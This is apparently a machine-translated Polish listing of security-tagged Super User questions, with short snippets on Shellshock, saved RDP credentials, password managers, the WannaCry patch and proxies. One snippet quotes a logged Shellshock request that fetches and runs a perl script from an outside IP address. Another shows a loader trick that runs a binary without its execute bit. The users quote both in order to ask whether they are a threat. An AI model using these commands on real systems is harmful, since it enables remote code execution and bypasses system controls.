Pytania otagowane jako security

Ochrona systemów komputerowych i informacji przed zagrożeniami, takimi jak kradzież lub zniszczenie danych.

3
Czy to atak, czy coś, o co należy się martwić? Shellshock?
Widziałem to access.logna moim serwerze testowym: > 173.45.100.18 - - [26/Sep/2014:07:09:53 +0200] "GET /cgi-bin/hi HTTP/1.0" 404 490 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget > http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat ; > perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"" Żaden z adresów nie jest powiązany ze mną ani z naszym zakresem …

3
Odwrócenie flagi wykonania w systemach Linux. Dlaczego to jest możliwe?
Podczas czytania tego znalazłem następujący exploit: % cp /usr/bin/id ~ % chmod -x ~/id % ls -al ~/id -rw-r--r-- 1 edd edd 22020 2012-08-01 15:06 /home/edd/id % ~/id zsh: permission denied: /home/edd/id % /lib/ld-linux.so.2 ~/id uid=1001(edd) gid=1001(edd) groups=1001(edd),1002(wheel) Ten fragment pokazuje, że możemy w trywialny sposób ominąć uprawnienia systemu plików …



3
Czy zapisane poświadczenia pulpitu zdalnego są bezpieczne na komputerze lokalnym?
Czy zapisane poświadczenia pulpitu zdalnego są bezpieczne (luźno mówiąc) na komputerze lokalnym? Nie są one nigdzie przechowywane jako czysty tekst, prawda? Edycja: Rozumiem nieodłączne ryzyko związane z zapisywaniem haseł. Z pewnością istnieje szereg skuteczności, na przykład zapisanie hasła za pomocą czegoś takiego CryptProtectData( co Google Chrome używa w systemie Win32 …


16
Menedżer haseł dla wielu komputerów? [Zamknięte]
Zamknięte. To pytanie jest nie na temat . Obecnie nie przyjmuje odpowiedzi. Chcesz poprawić to pytanie? Zaktualizować pytanie , dlatego na temat Super Użytkownika. Zamknięte 4 lata temu . Czy istnieje menedżer haseł, którego mogę używać na wielu komputerach, aby zapamiętać wszystkie hasła, których używam w odwiedzanych witrynach?


4
Jak sprawdzić, czy zainstalowana jest konkretna aktualizacja zabezpieczeń systemu Windows?
Biorąc pod uwagę, że krąży exploit ransomware WannaCry, chciałem sprawdzić, czy mój komputer ma konkretną aktualizację zabezpieczeń, która powinna zatrzymać lukę - najwyraźniej MS17-010, zakładając, że rozumiem lukę i to jest rzeczywiście właściwa łatka. Jak sprawdzić ten szczegół? Microsoft próbuje podać trochę szczegółów, ale jest to bełkot dla kogoś, kto …

6
Zabezpiecz folder hasłem
Jakie są dostępne opcje ochrony folderu hasłem? Mówię o wymaganiu hasła, aby faktycznie uzyskać dostęp do folderu, a nie tylko praw dostępu użytkownika. Czy oprogramowanie innych firm jest bezpieczne i stabilne? Jakie są rekomendacje?


3
Jaka jest różnica między serwerem proxy a siecią VPN?
Istnieje kilku dostawców usług, którzy pozwalają użytkownikowi omijać zapory ogniowe lub anonimizować dostęp do sieci. Niektóre z nich korzystają z serwerów proxy, niektóre z VPN. Większość ludzi twierdzi, że sieci VPN zwykle działają lepiej niż serwery proxy. Są również ogólnie droższe. Na przykład serwer proxy przyzna użytkownikowi międzynarodowemu dostęp do …
21 security  vpn  proxy 




Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.